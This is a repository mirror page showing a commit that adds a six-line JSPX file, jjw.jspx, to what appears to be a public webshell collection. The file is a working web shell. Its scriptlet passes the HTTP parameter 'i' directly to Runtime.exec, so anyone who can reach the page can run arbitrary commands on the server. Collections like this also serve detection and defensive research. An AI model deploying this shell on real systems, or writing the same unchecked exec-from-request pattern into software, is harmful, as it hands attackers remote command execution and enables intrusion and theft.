mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
6
jspx/jjw.jspx
Normal file
6
jspx/jjw.jspx
Normal file
@@ -0,0 +1,6 @@
|
|||||||
|
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
|
||||||
|
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
|
||||||
|
<jsp:scriptlet>
|
||||||
|
Runtime.getRuntime().exec(request.getParameter("i"));
|
||||||
|
</jsp:scriptlet>
|
||||||
|
</jsp:root>
|
||||||
Reference in New Issue
Block a user